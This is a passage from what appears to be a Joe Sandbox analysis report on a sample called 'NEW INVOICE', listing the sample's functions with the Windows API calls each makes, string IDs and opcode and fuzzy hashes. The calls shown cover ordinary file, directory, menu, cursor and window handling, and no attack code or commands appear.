                                                                                    • Opcode Fuzzy Hash: f0ae0bd5c84c8fbd9fa80e8b17a650ade3f6139d63811c55da114ce2128ba9af
                                                                                    • Instruction Fuzzy Hash: 96F1C571D143409BCB00EF61C881EAB73A4BF95308F44496FF9456B286E77DE909CB6A
                                                                                    APIs
                                                                                    • GetLocalTime.KERNEL32(?), ref: 0045DED4
                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 0045DEE4
                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0045DEF0
                                                                                    • _wcsncpy.LIBCMT ref: 0045DF0F
                                                                                    • __wsplitpath.LIBCMT ref: 0045DF54
                                                                                    • _wcscat.LIBCMT ref: 0045DF6C
                                                                                    • _wcscat.LIBCMT ref: 0045DF7E
                                                                                    • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0045DF93
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0045DFA7
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0045DFE5
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0045DFFB
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0045E00D
                                                                                    • _wcscpy.LIBCMT ref: 0045E019
                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0045E05F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentDirectory$Time$File$Local_wcscat$System__wsplitpath_wcscpy_wcsncpy
                                                                                    • String ID: *.*
                                                                                    • API String ID: 3201719729-438819550
                                                                                    • Opcode ID: 89541da3f554ebb8d42e95f45bc66f31ca584aff69b040987f949bd9346ecb30
                                                                                    • Instruction ID: 9ef8ac46b2ec3f8a2b66e183c5d6435db2730cdd54c1860218fefef83dfd89d7
                                                                                    • Opcode Fuzzy Hash: 89541da3f554ebb8d42e95f45bc66f31ca584aff69b040987f949bd9346ecb30
                                                                                    • Instruction Fuzzy Hash: D061A7B25043049BC724EF65C881E9FB3E8AF94704F048E1EF98987241DB79E949CB96
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: __wcsicoll$IconLoad
                                                                                    • String ID: blank$info$question$stop$warning
                                                                                    • API String ID: 2485277191-404129466
                                                                                    • Opcode ID: 5bed60ec3368b378429e4d7d86c3e9ed6cb6a0c6f582f3c961ebbe10ae210b10
                                                                                    • Instruction ID: 3fdcc892c2a25cebf9aff257507665a297d4e16c4260cb8f6e9492a672fb13e0
                                                                                    • Opcode Fuzzy Hash: 5bed60ec3368b378429e4d7d86c3e9ed6cb6a0c6f582f3c961ebbe10ae210b10
                                                                                    • Instruction Fuzzy Hash: CB2128B6B08301A7D610A725BC05FDF27489FA8365F004C2BF941E2283F3A8A45583BD
                                                                                    APIs
                                                                                    • CompareStringW.KERNEL32(?,?,004832AC,00000001,004832AC,00000001), ref: 00428611
                                                                                    • GetLastError.KERNEL32(?,?,004832AC,00000001,004832AC,00000001), ref: 00428627
                                                                                    • strncnt.LIBCMT ref: 00428646
                                                                                    • strncnt.LIBCMT ref: 0042865A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: strncnt$CompareErrorLastString
                                                                                    • String ID:
                                                                                    • API String ID: 1776594460-0
                                                                                    • Opcode ID: 16ce8c3a65625fd7540c51b5c1254bfa478756f7f63d0819a38d9cd03b2976a4
                                                                                    • Instruction ID: 056e5a993d73ec50dc3c8e072878bb631c9b69e1f80941a2a69bbd8adeb14d7f
                                                                                    • Opcode Fuzzy Hash: 16ce8c3a65625fd7540c51b5c1254bfa478756f7f63d0819a38d9cd03b2976a4
                                                                                    • Instruction Fuzzy Hash: 0DA1B131B01225AFDF219F61EC41AAF7BB6AF94340FA4402FF81196251DF3D8891CB58
                                                                                    APIs
                                                                                    • LoadIconW.USER32(?,00000063), ref: 004545DA
                                                                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004545EC
                                                                                    • SetWindowTextW.USER32(?,?), ref: 00454606
                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 0045461F
                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00454626
                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00454637
                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 0045463E
                                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00454663
                                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 0045467D
                                                                                    • GetWindowRect.USER32(?,?), ref: 00454688
                                                                                    • SetWindowTextW.USER32(?,?), ref: 004546FD
                                                                                    • GetDesktopWindow.USER32 ref: 00454708
                                                                                    • GetWindowRect.USER32(00000000), ref: 0045470F
                                                                                    • MoveWindow.USER32(?,?,00000000,?,?,00000000), ref: 00454760
                                                                                    • GetClientRect.USER32(?,?), ref: 0045476F
                                                                                    • PostMessageW.USER32(?,00000005,00000000,?), ref: 0045479E
                                                                                    • SetTimer.USER32(?,0000040A,?,00000000), ref: 004547E9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                    • String ID:
                                                                                    • API String ID: 3869813825-0
                                                                                    • Opcode ID: d6d25c813e590b752cbfd9858452ff05e3d443d6a6ce6916d89e520ab15b373f
                                                                                    • Instruction ID: 4e77de65cc6986e78e6be143d0a4b9e7f39e78804b6f4fc71fe9e35dfcfd5046
                                                                                    • Opcode Fuzzy Hash: d6d25c813e590b752cbfd9858452ff05e3d443d6a6ce6916d89e520ab15b373f
                                                                                    • Instruction Fuzzy Hash: 8C616D71604701AFD320DF68CD88F2BB7E8AB88709F004E1DF98697691D7B8E849CB55
                                                                                    APIs
                                                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 00458D2D
                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00458D3A
                                                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 00458D47
                                                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 00458D54
                                                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 00458D61
                                                                                    • LoadCursorW.USER32(00000000,00007F81), ref: 00458D6E
                                                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 00458D7B
                                                                                    • LoadCursorW.USER32(00000000,00007F80), ref: 00458D88
                                                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 00458D95
                                                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 00458DA2
                                                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 00458DAF
                                                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 00458DBC
                                                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 00458DC9
                                                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 00458DD6
                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00458DE3
                                                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 00458DF0
                                                                                    • GetCursorInfo.USER32 ref: 00458E03
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Cursor$Load$Info
                                                                                    • String ID:
                                                                                    • API String ID: 2577412497-0
                                                                                    • Opcode ID: 0c78b259ae472df09145ddf792cd37f85d2c816b82f1d484569203a38ef646a1
                                                                                    • Instruction ID: 36b4ee280ed0253346847529aeb00c95e660e1b7f2a6688567eec4957a26740b
                                                                                    • Opcode Fuzzy Hash: 0c78b259ae472df09145ddf792cd37f85d2c816b82f1d484569203a38ef646a1
                                                                                    • Instruction Fuzzy Hash: D9311671E4C3156AE7509F758C5AB1BBEE0AF40B54F004D2FF2889F2D1DAB9E4448B86
                                                                                    APIs
                                                                                    • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 004696CC
                                                                                    • GetFocus.USER32 ref: 004696E0
                                                                                    • GetDlgCtrlID.USER32(00000000), ref: 004696EB
                                                                                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046973F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePost$CtrlFocus
                                                                                    • String ID: 0
                                                                                    • API String ID: 1534620443-4108050209
                                                                                    • Opcode ID: e5c32c991b5ca6252707de8ebf482154a45a931f584edf505bd4e03ae59cba12
                                                                                    • Instruction ID: 7d80af5808d25915b866e76daf530f36ef8b085de22dc1c7fc8dbb607ae8adb7
                                                                                    • Opcode Fuzzy Hash: e5c32c991b5ca6252707de8ebf482154a45a931f584edf505bd4e03ae59cba12
                                                                                    • Instruction Fuzzy Hash: 1591E1B1604301ABD710DF14D884BABB7A8FB89714F004A1EF99497391E7B4DC49CBAB
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00468107
                                                                                    • GetMenuItemInfoW.USER32(?,00000007,00000000,?), ref: 00468190
                                                                                    • GetMenuItemCount.USER32(?), ref: 00468227
                                                                                    • DeleteMenu.USER32(?,00000005,00000000), ref: 004682B8
                                                                                    • DeleteMenu.USER32(?,00000004,00000000), ref: 004682C1
                                                                                    • DeleteMenu.USER32(?,00000006,00000000,?,00000004,00000000), ref: 004682CA
                                                                                    • DeleteMenu.USER32(00000000,00000003,00000000,?,00000006,00000000,?,00000004,00000000), ref: 004682D3
                                                                                    • GetMenuItemCount.USER32 ref: 004682DC
                                                                                    • SetMenuItemInfoW.USER32 ref: 00468317
                                                                                    • GetCursorPos.USER32(00000000), ref: 00468322
                                                                                    • SetForegroundWindow.USER32(?), ref: 0046832D
                                                                                    • TrackPopupMenuEx.USER32(?,00000000,00000000,00000006,?,00000000,?,?,00000006,00000000,?,00000004,00000000), ref: 00468345
                                                                                    • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468352
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                    • String ID: 0
                                                                                    • API String ID: 3993528054-4108050209
                                                                                    • Opcode ID: d5573be1ba1a613c106f8e764602a2d45d8b266f51cd1eb04f60dea375430468
                                                                                    • Instruction ID: a450cccb4b36e122d1eca3afa35c85d1e57e2007e4dd5bc50ce81cada7f4397f
                                                                                    • Opcode Fuzzy Hash: d5573be1ba1a613c106f8e764602a2d45d8b266f51cd1eb04f60dea375430468
                                                                                    • Instruction Fuzzy Hash: 3C71C070648301ABE3309B14CC49F5BB7E8BF86724F244B0EF5A5563D1DBB9A8458B1B
                                                                                    APIs
                                                                                    • DragQueryPoint.SHELL32(?,?), ref: 0046F2DA
                                                                                      • Part of subcall function 00441CB4: ClientToScreen.USER32(00000000,?), ref: 00441CDE
                                                                                      • Part of subcall function 00441CB4: GetWindowRect.USER32(?,?), ref: 00441D5A
                                                                                      • Part of subcall function 00441CB4: PtInRect.USER32(?,?,?), ref: 00441D6F
                                                                                    • SendMessageW.USER32(?), ref: 0046F34C
                                                                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0046F355
                                                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0046F37F
                                                                                    • _wcscat.LIBCMT ref: 0046F3BC
                                                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0046F3D1
                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0046F3E3
                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0046F3F1
                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0046F40E
                                                                                    • DragFinish.SHELL32(?), ref: 0046F414
                                                                                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0046F4FC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Drag$Query$FileRect$ClientFinishPointProcScreenWindow_wcscat
                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                    • API String ID: 4085615965-3440237614
                                                                                    • Opcode ID: e6dc8860684545ee98a9b737372e313d8034606243f87d3f07a4344f64e9a130
                                                                                    • Instruction ID: d92027b63b9478c52a8b17f069484fb886a707b260a555cedefccfc898d4b85d
                                                                                    • Opcode Fuzzy Hash: e6dc8860684545ee98a9b737372e313d8034606243f87d3f07a4344f64e9a130
                                                                                    • Instruction Fuzzy Hash: 596170716043009BD700EF54D885E5FB7A8FFC9714F104A2EF99097291D7B8A949CBAA
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: __wcsicoll
                                                                                    • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                                                    • API String ID: 3832890014-4202584635
                                                                                    • Opcode ID: 3f0b73fdde0a53fb0a00575eab05b85141dd4a2dcfcc4ab19f269ee93bd0b8a8
                                                                                    • Instruction ID: bf73cd225697d97a5a257e466bf5c8c79b4efa22739c650e03c6b1f9c6e9338c
                                                                                    • Opcode Fuzzy Hash: 3f0b73fdde0a53fb0a00575eab05b85141dd4a2dcfcc4ab19f269ee93bd0b8a8
                                                                                    • Instruction Fuzzy Hash: 1D01616160562122FE11322A7C03BDF15898F5139AF14447BFC05F1282FF4DDA8692EE
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 004669C4
                                                                                    • _wcsncpy.LIBCMT ref: 00466A21
                                                                                    • _wcsncpy.LIBCMT ref: 00466A4D
                                                                                      • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                      • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                    • _wcstok.LIBCMT ref: 00466A90
                                                                                      • Part of subcall function 004142A3: __getptd.LIBCMT ref: 004142A9
                                                                                    • _wcstok.LIBCMT ref: 00466B3F
                                                                                    • _wcscpy.LIBCMT ref: 00466BC8
                                                                                    • GetOpenFileNameW.COMDLG32(00000058), ref: 00466CFE
                                                                                    • _wcslen.LIBCMT ref: 00466D1D
                                                                                    • _memset.LIBCMT ref: 00466BEE
                                                                                      • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                    • _wcslen.LIBCMT ref: 00466D4B
                                                                                    • GetSaveFileNameW.COMDLG32(00000058), ref: 00466D9E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen$FileName_memset_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                                                    • String ID: X$HH
                                                                                    • API String ID: 3021350936-1944015008
                                                                                    • Opcode ID: b06cb37d3db4ad53d3a41f94d3d7a052046d00add24c9c6de48b5fd017d77e84
                                                                                    • Instruction ID: 73e83d7ea4d12cbe09e247b0b8120e99e9ae8af51722f6ce2f45a1bbad6557a4
                                                                                    • Opcode Fuzzy Hash: b06cb37d3db4ad53d3a41f94d3d7a052046d00add24c9c6de48b5fd017d77e84
                                                                                    • Instruction Fuzzy Hash: D1C1B2715043408BC714EF65C981A9FB3E4BF84304F15892FF949AB292EB78E905CB9B
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 0045F4AE
                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0045F519
                                                                                    • SetMenuItemInfoW.USER32(00000008,00000004,00000000,?), ref: 0045F556
                                                                                    • Sleep.KERNEL32(000001F4,?,?,00000000,?), ref: 0045F568
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: InfoItemMenu$Sleep_memset
                                                                                    • String ID: 0
                                                                                    • API String ID: 1504565804-4108050209
                                                                                    • Opcode ID: b2eb264578549714347dca4c6cc1c63db220fd8d89572d1a81e0d1d82c6caf25
                                                                                    • Instruction ID: 9e8996cb251b45e9fd8013479734a73363ce4640cf951279a7d2fdadd0934edb
                                                                                    • Opcode Fuzzy Hash: b2eb264578549714347dca4c6cc1c63db220fd8d89572d1a81e0d1d82c6caf25
                                                                                    • Instruction Fuzzy Hash: E171E3711043406BD3109F54DD48FABBBE8EBD5306F04086FFD8587252D6B9A94EC76A
                                                                                    APIs
                                                                                    • DestroyWindow.USER32(?,004A83D8,?), ref: 00455800
                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 00455847
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$CreateDestroy
                                                                                    • String ID: ,$tooltips_class32
                                                                                    • API String ID: 1109047481-3856767331
                                                                                    • Opcode ID: 0ca5ab61cf6a2cad142a114e1c8ac043728d1bef212d4075191e352a737c6d07
                                                                                    • Instruction ID: af4df8b80438f92fd5356fe82daba85812243c44dff517d7eb602cf52e2cfce3
                                                                                    • Opcode Fuzzy Hash: 0ca5ab61cf6a2cad142a114e1c8ac043728d1bef212d4075191e352a737c6d07
                                                                                    • Instruction Fuzzy Hash: BF719075244704AFE320DB28CC85F7B77E4EB89700F50491EFA8197391E6B5E905CB59
                                                                                    APIs
                                                                                    • _wcsncpy.LIBCMT ref: 0045CCFA
                                                                                    • __wsplitpath.LIBCMT ref: 0045CD3C
                                                                                    • _wcscat.LIBCMT ref: 0045CD51
                                                                                    • _wcscat.LIBCMT ref: 0045CD63
                                                                                    • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,00000104,?), ref: 0045CD78
                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,00000104,?), ref: 0045CD8C
                                                                                      • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                                                                                    • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDD0
                                                                                    • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDE6
                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDF8
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0045CE08
                                                                                    • _wcscpy.LIBCMT ref: 0045CE14
                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CE5A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                                                                                    • String ID: *.*
                                                                                    • API String ID: 1153243558-438819550
                                                                                    • Opcode ID: 5bfa431d4ef7075d2dc920e4199facb1e2714bc7465ef22df03346902ac9b5e5
                                                                                    • Instruction ID: 4b7f18f3392d5c51d0b0bcfc25b88d1348604f1c1aa494fd035d881d108a9fe9
                                                                                    • Opcode Fuzzy Hash: 5bfa431d4ef7075d2dc920e4199facb1e2714bc7465ef22df03346902ac9b5e5
                                                                                    • Instruction Fuzzy Hash: 0561E5B61043419FD731EF54C885AEBB7E4EB84305F44882FED8983242D67D998E879E
                                                                                    APIs
